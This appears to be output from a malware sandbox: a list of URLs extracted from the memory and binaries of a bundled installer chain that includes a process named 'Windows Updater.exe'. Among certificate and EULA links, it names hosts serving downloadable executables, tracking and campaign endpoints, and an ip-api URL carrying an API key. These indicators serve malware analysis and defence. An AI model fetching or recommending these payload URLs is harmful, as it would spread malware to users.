                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.thedownloadplanet.com/termsofuse
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/acrn/acrn.crl0
                                  Source: a1.exe, 00000014.00000003.2316716305.0000000004329000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
                                  Source: a1.exe, 00000014.00000003.2317121482.000000000440A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www2.postsignum.cz/crl/psrootqca2.crl01
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://advancedmanager.io/eula
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://advancedmanager.io/privacy-policy
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/N
                                  Source: MSI80A7.tmp.21.drString found in binary or memory: https://allroadslimit.com/updates.txt
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/updates.txtByY
                                  Source: a1.exe, 00000014.00000003.2312873578.00000000043CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/updates.txtL
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/updates.txtMa
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/updates.txtX
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://allroadslimit.com/updates.txtfy%
                                  Source: chromecache_658.19.drString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/logo/
                                  Source: a0.exe, 00000005.00000003.2247159596.000000000243D000.00000004.00001000.00020000.00000000.sdmp, a0.exe, 00000005.00000003.2190187484.0000000002650000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2232917333.00000000036FB000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2232917333.000000000373B000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2234120014.00000000024EC000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2234120014.000000000249C000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2234120014.00000000024E5000.00000004.00001000.00020000.00000000.sdmp, a0.tmp, 00000007.00000003.2195514724.0000000003490000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://axsboe-campaign.com/pixel?pmhzmq=fhoohvpn6e7i
                                  Source: a1.exe, a1.exe, 00000014.00000003.2487171415.0000000004382000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486195028.000000000437E000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, a1.exe, 00000014.00000002.2489984022.0000000004382000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: https://collect.installeranalytics.com
                                  Source: a1.exe, 00000014.00000002.2489922583.0000000004348000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487272029.000000000433D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487407898.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486296191.000000000433D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://collect.installeranalytics.com/
                                  Source: a1.exe, 00000014.00000002.2489922583.0000000004348000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487272029.000000000433D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487407898.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486296191.000000000433D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://collect.installeranalytics.com/c
                                  Source: a1.exe, 00000014.00000002.2489922583.0000000004348000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487272029.000000000433D000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2487407898.0000000004345000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486296191.000000000433D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://collect.installeranalytics.com/r
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490733233.000000006A5A1000.00000002.00000001.01000000.0000001E.sdmp, v113.exe, 00000020.00000002.2754964724.000000006A0DC000.00000002.00000001.01000000.00000024.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, MSIB1F8.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: https://collect.installeranalytics.comhttp://collect.installeranalytics.comhttps://installeranalytic
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crl.anf.es/AC/ANFServerCA.crl0
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://d157kf58cz5ccb.cloudfront.net/dcc.exe
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://digitalpulsedata.com/tos
                                  Source: Windows Updater.exe, 0000001F.00000003.2548000487.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com//
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/7
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.0000000000664000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2477945437.0000000000660000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2495094985.00000000017D0000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000F9D000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v113.exe
                                  Source: Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000F9D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v113.exe&
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v113.exeManager
                                  Source: Windows Updater.exe, 0000001C.00000003.2486073530.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2480891786.0000000001C00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2477926232.000000000069C000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2487349535.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2487619359.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2487867019.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2487502344.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2534661329.000000000064D000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000002.2534661329.0000000000660000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2484824285.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488325932.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488494506.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2484917162.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2486261492.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488387424.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488013680.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488554384.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488224412.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488134876.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2488073358.0000000001D00000.00000004.00000800.00020000.00000000.sdmp, Windows Updater.exe, 0000001C.00000003.2487749710.0000000001D00000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v114.exe
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v114.exe&
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F5D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v114.exef
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.0000000000664000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dl.likeasurfer.com/updates/v114.exes
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://false.apparelsilver.xyz/
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000819000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005948000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.00000000007A8000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=1701869569
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000819000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=17018695697
                                  Source: setup.tmp, 00000004.00000002.4546268057.00000000007A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=1701869569GDc
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000857000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://false.apparelsilver.xyz/ss.php?a=3890&cc=US&t=1701869569c
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://finers.s3.amazonaws.com/wsclient-installer-1.25.win.04.exe
                                  Source: MSI80A7.tmp.21.drString found in binary or memory: https://happybrewfriends.com/updates.txt
                                  Source: Windows Updater.exe, 0000001C.00000002.2534661329.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happybrewfriends.com/updates.txtP
                                  Source: Windows Updater.exe, 0000001F.00000002.2922284466.0000000000F27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://happybrewfriends.com/updates.txtager
                                  Source: a1.exeString found in binary or memory: https://installeranalytics.com
                                  Source: ZmWSzgevgt.exeString found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://legal.opera.com/eula/computers/
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://legal.opera.com/privacy/
                                  Source: MSI80A7.tmp.21.drString found in binary or memory: https://microleaves.com/privacy-policy
                                  Source: a1.exe, 00000014.00000003.2312873578.00000000043CA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://microleaves.com/privacy-policyc
                                  Source: MSI80A7.tmp.21.drString found in binary or memory: https://microleaves.com/terms-and-conditions
                                  Source: a1.exe, 00000014.00000003.2353089785.000000000438F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://microleaves.com/terms-and-conditionsK
                                  Source: a1.exe, 00000014.00000003.2317424410.00000000043E7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                                  Source: a1.exe, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2313068197.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pro.ip-api.com/json?key=IQgnKO7n5Bmojup
                                  Source: a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pro.ip-api.com/json?key=IQgnKO7n5Bmojup8bX
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://pro.ip-api.com/json?key=IQgnKO7n5BmojupButtonText_Finish&FinishManufacturerAW
                                  Source: a1.exe, 00000014.00000003.2487171415.0000000004382000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2486195028.000000000437E000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2489984022.0000000004382000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pro.ip-api.com/json?key=IQgnKO7n5BmojupSc
                                  Source: a1.exe, 00000014.00000003.2453233427.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.00000000043AF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000002.2490078506.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2485911641.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2353089785.00000000043AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pro.ip-api.com/json?key=IQgnKO7n5Bmojupb
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://rca.e-szigno.hu/ocsp0-
                                  Source: a1.exe, 00000014.00000003.2316445533.000000000436D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://repository.tsp.zetes.com0
                                  Source: ZmWSzgevgt.tmp, 00000001.00000003.2010247622.0000000003490000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000002.4550403877.000000000242C000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sizestep.online/tracker/thank_you.php?trk=2598
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://staranalytics.io/EULA.html
                                  Source: a1.exe, 00000014.00000003.2316597553.0000000004345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.certicamara.com/marco-legal0Z
                                  Source: a1.exe, 00000014.00000003.2310319349.0000000005AC0000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2452995698.000000000435A000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005920000.00000004.00001000.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2314508919.00000000043BF000.00000004.00000020.00020000.00000000.sdmp, a1.exe, 00000014.00000003.2310319349.0000000005C55000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI743D.tmp.21.dr, MSI5D6E.tmp.21.dr, MSIF8B5.tmp.20.dr, MSI80A8.tmp.21.dr, MSI232D.tmp.21.dr, MSIB1F8.tmp.21.dr, MSI80A7.tmp.21.dr, MSICDCA.tmp.21.dr, MSI12C7.tmp.21.drString found in binary or memory: https://www.advancedinstaller.com
                                  Source: setup.tmp, 00000004.00000002.4546268057.0000000000831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.agenment.cloud/
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005948000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.agenment.cloud/win/Inalstal_98220.exe
                                  Source: setup.tmp, 00000004.00000002.4557910495.0000000005948000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.agenment.cloud/win/Inalstal_98220.exe2
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ACTAS/789230
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/AC/ANFServerCA.crl0
                                  Source: a1.exe, 00000014.00000003.2317333312.00000000043F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.anf.es/address/)1(0&
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4555610493.000000000391B000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.biphic.com/6X6S73Q/KLT11XW/?sub1=2598&sub2=2598
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                                  Source: a1.exe, 00000014.00000003.2316491925.000000000435E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                                  Source: a0.tmp, 00000007.00000003.2226960209.0000000005842000.00000004.00001000.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547912168.0000000000F93000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000002.2922284466.0000000000FDC000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2547801636.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, Windows Updater.exe, 0000001F.00000003.2548000487.0000000000FD8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002830000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.000000000290E000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2648983734.00000000032B6000.00000004.00001000.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2560788358.0000000002B49000.00000004.00001000.00020000.00000000.sdmp, MSI5D6E.tmp.21.drString found in binary or memory: https://www.digicert.com/CPS0
                                  Source: expand.exe, 0000000A.00000003.2221562251.00000000005CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
                                  Source: v113.exe, 00000020.00000003.2567036448.000000000275D000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2730463369.00000000013C4000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2737590571.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000002.2751901417.00000000013CA000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2734012036.00000000013C8000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2561830112.000000000134F000.00000004.00000020.00020000.00000000.sdmp, v113.exe, 00000020.00000003.2649322052.00000000013C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hulkisbulish.com/updates.txt
                                  Source: setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.inlogbrowser.
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.inlogbrowser.com/eula.txt
                                  Source: setup.exe, 00000003.00000003.2106854076.00000000026A0000.00000004.00001000.00020000.00000000.sdmp, setup.exe, 00000003.00000002.4546460668.00000000023C9000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4546268057.0000000000804000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4550600836.000000000259F000.00000004.00001000.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.000000000596F000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000002.4557910495.0000000005976000.00000004.00000020.00020000.00000000.sdmp, setup.tmp, 00000004.00000003.2112076757.0000000003630000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.inlogbrowser.com/pp.txt
                                  Source: ZmWSzgevgt.exe, 00000000.00000003.2006403390.0000000002560000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.exe, 00000000.00000003.2006775395.000000007FB40000.00000004.00001000.00020000.00000000.sdmp, ZmWSzgevgt.tmp, 00000001.00000000.2008194649.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-1L53Q.tmp.7.drString found in binary or memory: https://www.innosetup.com/
